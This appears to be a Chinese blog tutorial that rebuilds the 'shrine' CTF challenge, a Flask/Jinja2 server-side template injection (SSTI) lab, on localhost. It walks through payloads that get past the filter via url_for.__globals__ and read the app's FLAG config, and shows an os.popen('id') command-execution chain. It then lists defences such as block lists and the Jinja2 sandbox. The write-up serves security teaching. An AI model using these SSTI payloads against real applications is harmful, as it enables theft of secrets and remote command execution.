当前位置: 首页 > article >正文

保姆级教程:手把手复现攻防世界shrine靶场(Flask+Jinja2 SSTI)

从零构建Flask SSTI靶场绕过黑名单获取FLAG的实战指南第一次接触CTF中的SSTI漏洞时我完全被那些奇怪的{{}}符号和魔术方法搞晕了。直到亲手搭建环境复现漏洞才真正理解模板注入的精妙之处。本文将带你从零开始完整复现攻防世界shrine靶场的SSTI漏洞利用过程特别适合刚入门Web安全的新手。1. 环境搭建与靶场初始化在开始之前我们需要准备以下工具Python 3.6推荐3.8版本Flask框架本文使用2.0.1版本任意代码编辑器VS Code/PyCharm等浏览器或Burp Suite等HTTP工具首先创建项目目录并安装依赖mkdir shrine_target cd shrine_target python -m venv venv source venv/bin/activate # Windows使用 venv\Scripts\activate pip install flask2.0.1接着创建app.py文件写入靶场核心代码import flask import os app flask.Flask(__name__) app.config[FLAG] os.environ.pop(FLAG) app.route(/) def index(): return open(__file__).read() app.route(/shrine/path:shrine) def shrine(shrine): def safe_jinja(s): s s.replace((, ).replace(), ) blacklist [config, self] return .join([{{% set {}None%}}.format(c) for c in blacklist]) s return flask.render_template_string(safe_jinja(shrine)) if __name__ __main__: app.run(debugTrue)设置环境变量并启动服务export FLAGflag{test_flag_for_shrine} python app.py注意Windows系统使用set FLAGflag{test_flag_for_shrine}设置环境变量2. 代码审计与漏洞分析让我们拆解这段代码的关键安全点敏感数据存储app.config[FLAG]将flag存入应用配置os.environ.pop(FLAG)确保环境变量中不留痕迹路由设计/路由直接返回源码自解释型靶场/shrine/path:shrine接收动态路径参数过滤机制s s.replace((, ).replace(), ) # 过滤所有括号 blacklist [config, self] # 黑名单变量模板预处理{{% set configNone%}}{{% set selfNone%}} 用户输入关键漏洞点在于虽然过滤了config和self变量但未限制通过对象属性访问config的方式。3. 黑名单绕过技术详解常规SSTI payload如{{config}}会被拦截我们需要寻找替代方案。Flask在渲染模板时会自动注入以下有用对象对象/函数类型可用性url_for函数可用get_flashed_messages函数可用request对象可用session对象可用利用函数对象的__globals__属性可以绕过限制{{ url_for.__globals__[current_app].config }}这个payload的工作流程url_for是Flask注入的全局函数__globals__包含函数定义时的全局命名空间current_app指向Flask应用实例.config访问应用配置字典4. 实战漏洞利用步骤4.1 基础测试首先测试基本模板注入http://127.0.0.1:5000/shrine/{{7*7}}如果返回49说明存在模板注入。4.2 绕过括号过滤尝试包含括号的payload会失败http://127.0.0.1:5000/shrine/{{.__class__}}因为所有括号都被移除了。4.3 使用属性访问链构造不需要括号的payloadhttp://127.0.0.1:5000/shrine/{{url_for.__globals__.current_app.config}}4.4 最终payload由于.和[]在属性访问中等价以下两种形式都可以{{url_for.__globals__[current_app].config[FLAG]}} {{get_flashed_messages.__globals__.current_app.config.FLAG}}在浏览器中访问http://127.0.0.1:5000/shrine/{{url_for.__globals__[current_app].config[FLAG]}}4.5 常见问题排查返回空白页检查Flask版本pip show flask确保环境变量FLAG已设置500内部错误可能是Jinja2渲染错误检查payload中的特殊字符是否被编码黑名单生效确保没有直接使用config或self使用__globals__间接访问5. 防御方案与安全实践理解了攻击原理后我们来看如何加固应用更严格的黑名单blacklist [config,self,__globals__,_,|join,mro]使用沙盒环境from jinja2.sandbox import SandboxedEnvironment env SandboxedEnvironment()输入验证def validate_input(input_str): forbidden [{{,}},__] return not any(f in input_str for f in forbidden)最小权限原则不要将敏感数据存储在应用配置中使用单独的密钥管理系统在开发过程中可以定期使用以下工具进行安全检查banditPython代码静态分析工具sqlmap虽然主要用于SQL注入但也能检测部分SSTI自定义模糊测试脚本6. 扩展实验与学习建议为了加深理解建议尝试以下实验修改黑名单测试添加url_for到黑名单后如何绕过尝试使用request对象获取配置不同版本影响pip install flask1.0.2测试旧版本是否存在差异替代利用链{{lipsum.__globals__.os.popen(id).read()}}推荐的学习路径先掌握Python魔术方法__class__、__base__等学习Jinja2模板语法研究Flask框架的上下文机制练习CTF中其他SSTI题目记得在实验环境中操作不要在生产系统尝试这些技术。理解漏洞原理的目的是为了构建更安全的系统而非实施非法攻击。

相关文章:

保姆级教程:手把手复现攻防世界shrine靶场(Flask+Jinja2 SSTI)

从零构建Flask SSTI靶场:绕过黑名单获取FLAG的实战指南 第一次接触CTF中的SSTI漏洞时,我完全被那些奇怪的{{}}符号和魔术方法搞晕了。直到亲手搭建环境复现漏洞,才真正理解模板注入的精妙之处。本文将带你从零开始,完整复现攻防世…...

Arduino Uno引脚全解析:从电源管理到PWM调光,新手必看的实战指南

Arduino Uno引脚深度实战:从电源配置到智能控制的全能指南 当你第一次拿起Arduino Uno开发板时,那些密密麻麻的金属引脚可能会让你感到困惑。这块小小的蓝色板子如何通过这些引脚与外部世界对话?本文将带你超越简单的引脚定义,深入…...

基于Docker和Orthanc构建高效医学影像存储系统的实践指南

1. 为什么选择DockerOrthanc搭建医学影像系统 在医院信息化建设中,医学影像存储一直是个让人头疼的问题。传统的PACS系统往往价格昂贵、部署复杂,而且扩展性差。我去年帮一家社区医院做系统升级时,他们原有的影像系统已经用了8年,…...

NXP i.MX8M Plus Cortex-M7多核通信与实时控制开发实战

1. 认识i.MX8M Plus的异构多核架构 第一次拿到NXP i.MX8M Plus开发板时,最让我惊讶的是它独特的"大小核"设计。这颗芯片内部其实藏着两个完全不同的世界:一边是四核Cortex-A53组成的"大脑",主频高达1.6GHz,能…...

计算机毕设 java基于微信小程序点餐系统的设计与实现 微信小程序智能点餐平台开发 基于 SpringBoot 的餐饮在线点餐系统设计

计算机毕设 java基于微信小程序点餐系统的设计与实现pmz399(配套有源码 程序 mysql 数据库 论文)本套源码可以先看具体功能演示视频领取,文末有联 xi 可分享随着移动互联网的普及和微信小程序的广泛应用,“互联网 餐饮” 成为行业…...

LeetCode 48 1886.矩阵旋转与判断

LeetCode 48 & 1886.矩阵旋转与判断 题目概览 [LeetCode 48] 旋转图像 给定一个 n n 的二维矩阵 matrix 表示一个图像,请你将图像顺时针旋转 90 度,必须原地旋转。 [LeetCode 1886] 判断矩阵经轮转后是否一致 给定两个 n n 的矩阵 mat 和 target&a…...

Comsol纳米摩擦发电机仿真计算模型探索

Comsol纳米摩擦发电机仿真计算模型,采用静电场对相反电极材料感应的表面电荷进行计算,可以得到不同电极距离下计算模型的电势、电场分布最近在研究Comsol纳米摩擦发电机仿真计算模型,感觉还挺有意思的,来和大家分享一下&#x1f6…...

计算机毕设 java 燐燐开花二手交易系统 Java 二手商品在线交易与管理平台开发 基于 SpringBoot 的二手交易商城系统实现

计算机毕设 java 燐燐开花二手交易系统 7rvj49(配套有源码 程序 mysql 数据库 论文)本套源码可以先看具体功能演示视频领取,文末有联 xi 可分享在互联网与共享经济的双重推动下,二手商品交易需求日益旺盛,但传统二手交…...

CAD二次开发实战:5分钟搞定TXT坐标转DWG图纸(C#代码详解)

CAD二次开发实战:5分钟实现TXT坐标转DWG图纸(C#代码精解) 在工程设计领域,数据格式转换是高频需求。许多传统测绘设备输出的坐标数据仍以TXT文本形式保存,而设计人员需要将这些数据可视化到DWG图纸中。手动输入不仅效率…...

vue+python人工智能AI问答时代个人计算机的安全防护科普系统

目录技术栈选择系统架构设计核心功能实现数据安全策略部署与测试用户教育内容持续维护计划项目技术支持源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作技术栈选择 前端采用Vue 3框架,结合Element UI或Ant Design Vue组件库实现…...

腾讯云GPU实例上,用Isaac Sim 5.0和Isaac Lab搭建GR00T仿真环境,保姆级避坑指南

腾讯云GPU实例部署Isaac Sim 5.0全流程:从零搭建到稳定运行的深度实践 当我在腾讯云上第一次尝试部署Isaac Sim 5.0时,本以为按照官方文档就能轻松搞定,结果却遭遇了VNC黑屏、快捷键失效、密码重置卡住等一系列问题。这篇文章将分享我在腾讯云…...

保姆级教程:从下载到配置,手把手搞定CANoe车载测试环境(附CAN盒选购指南)

从零搭建CANoe车载测试环境:避坑指南与实战配置 第一次打开CANoe软件时,那个复杂的界面和密密麻麻的选项让我完全不知所措。作为汽车电子领域最主流的测试工具,CANoe的强大功能背后是陡峭的学习曲线。本文将分享我三年来从零开始搭建测试环境…...

vue+python产品售后服务跟踪系统的设计与实现6ffp13w7

目录系统架构设计功能模块划分技术实现细节数据库设计开发计划部署方案项目技术支持源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作系统架构设计 采用前后端分离架构,前端使用Vue.js框架构建用户界面,后端使用Pytho…...

华为无线网络部署实战:基于RADIUS认证的企业级WLAN配置指南

1. 企业级WLAN部署的核心挑战 在中大型企业无线网络部署中,最头疼的问题莫过于如何平衡安全性和用户体验。我见过太多企业为了图省事直接使用预共享密钥(PSK)认证,结果要么因为密码泄露导致网络被蹭,要么每次有员工离职…...

Python实战:用中智集解决模糊决策问题(附完整代码)

Python实战:用中智集解决模糊决策问题(附完整代码) 在数据科学和机器学习领域,决策问题往往伴随着不确定性。传统的模糊集理论已经无法完全满足复杂场景下的需求,这时中智集(Neutrosophic Set)作…...

银监会G01报表填报避坑指南:最新251版与231版差异全解析

G01报表251版与231版差异解析:银行填报人员必知的12个关键点 每当季度报表报送季来临,银行填报人员总会面临版本更新带来的困扰。G01《资产负债项目统计表》作为银监会1104报表体系中最核心的报表之一,其251版与231版之间的差异直接影响着数据…...

实验室旧服务器(Ubuntu 18)无网环境,如何用Ollama+DeepSeek R1搭建本地AI助手(附Open WebUI白屏解决方案)

在Ubuntu 18无网环境中部署Ollama与DeepSeek R1的完整指南 老旧服务器往往面临系统版本过时、网络隔离等现实约束,但这并不妨碍我们挖掘其剩余价值。本文将手把手带您完成Ubuntu 18系统下的离线AI助手部署,重点解决无网环境带来的特殊挑战。 1. 环境准备…...

永磁同步电机PMSM参数辨识与SVPWM矢量控制仿真探索

永磁同步电机PMSM参数辨识svpwm矢量控制 初试速度恒定 Matlab/simulink仿真(2018a及以上版本),最近在搞永磁同步电机(PMSM)相关的研究,涉及到参数辨识以及SVPWM矢量控制,并且初试速度恒定,用的是Matlab/Sim…...

双向Buck-Boost变换器:电压外环与电流内环控制的平均电流管理技术,实现模式切换无过压过...

双向buck-boost变换器, 采用电压外环, 电流内环控制, 平均电流控制。 在buck模式与boost模式之前切换时,不会发生过压与过流。 该拓补可以用于储能中。双向buck-boost变换器最近在储能领域火得不行,这玩意儿既能当充电…...

从CMT2300A实战出发:Sub1G射频匹配电路设计要点与315MHz应用详解

1. CMT2300A芯片与Sub1G射频基础认知 第一次拿到CMT2300A这颗国产Sub1G射频芯片时,最吸引我的是它127MHz到1020MHz的超宽工作频段。这意味着一颗芯片就能覆盖智能家居、工业遥控等场景常用的315MHz/433MHz/868MHz等多个频点。不过实际调试中发现,射频匹配…...

Comsol 中光子晶体仿真:拓扑荷、偏振态及相关特性探索

comsol光子晶体仿真,拓扑荷,偏振态。 三维能带,三维Q,Q因子计算。 远场偏振计算。在光子晶体领域的研究中,Comsol 是一款极为强大的工具,它能帮助我们深入探究各种复杂的光学现象,今天咱们就聊聊…...

半波整流电路DIY实战:从零搭建一个简易电源(附波形实测对比)

半波整流电路DIY实战:从零搭建一个简易电源(附波形实测对比) 在电子制作的世界里,电源电路就像人体的心脏,为各种电子设备提供稳定的能量。而半波整流电路,则是电源设计中最基础也最经典的入门项目。不同于…...

Comsol 下复合绝缘子的仿真探索

Comsol 复合绝缘子仿真,包括污秽种类、污秽附着面积等对绝缘子电场分布、绝缘子污闪电压的影响。 绝缘子电-热-流耦合分析,电势分布线图。在电力系统领域,复合绝缘子的性能研究至关重要。今天咱们就来聊聊利用 Comsol 软件对复合绝缘子进行的…...

Comsol中光子晶体光纤相关特性计算漫谈

comsol光子晶体光纤有效折射率,模式色散,有效模式面积计算,在光子学领域,光子晶体光纤以其独特的光学特性备受关注。今天咱就唠唠在Comsol里计算光子晶体光纤的有效折射率、模式色散以及有效模式面积这几个关键参数。 有效折射率计…...

霍尔木兹海峡:帝国黄昏的祭坛?

【桥水基金创始人瑞达利欧3月16日发布一则可怕的警告:美国、以色列和伊朗之间的冲突将围绕霍尔木兹海峡展开决定性对抗,受其结果影响的将远不止石油价格。它将决定美国领导的全球秩序能否存续。】当达利欧将霍尔木兹海峡的波涛与1956年苏伊士运河的硝烟重…...

人-机交互是新文科与新理科融合的最佳窗口

人机交互(Human-Machine Interaction, HMI)作为一门交叉学科,本质上是技术与人文的深度融合,其发展过程中天然蕴含着“新文科”与“新理科”的双重基因。这里的“新文科”强调人文社科的创新性转型(如跨学科融合、技术…...

人机协作的核心困局,终于被这篇顶会论文破解了

字数 2393,阅读大约需 12 分钟人机协作的核心困局,终于被这篇顶会论文破解了你有没有想过,为什么明明AI的独立准确率比人高,人机一起做决策时,效果反而还不如AI单独干?从医疗影像诊断到校园招聘筛选&#x…...

从零到全网通:一个实验彻底搞懂VLAN、三层交换与静态路由(华为eNSP实战)

摘要:你是不是也遇到过这种情况——VLAN配好了,接口也亮了,但不同网段的PC就是ping不通?别慌,这几乎是每个网络初学者的“必经之路”。今天,我用一个包含3台路由器、4台三层交换机、5台二层交换机、8台PC的复杂实验,带你从头到尾跑通一次。我会用“建房子”的比喻,把终…...

交换机堆叠与集群完全指南:从入门到实战,一篇搞定所有难题

引言 在构建或维护一个中型到大型网络时,你是否遇到过这样的困扰:一台交换机的端口不够用?管理十几台交换机需要来回切换IP地址太麻烦?万一核心设备宕机,网络就全线瘫痪? 其实,解决这些问题的钥匙就藏在“堆叠”和“集群”这两项技术里。很多人对这两个概念一知半解,…...

人工智能如何改变 Anthropic 的工作方式47

如果有一天,你走进公司,发现写代码、查 bug、跑实验的大部分体力活,都已经由一位看不见的 AI 搭档在后台悄悄完成了——而你更多是在提问题、定方向、做决策,而不是一行行敲代码,这会是什么感觉?是兴奋&…...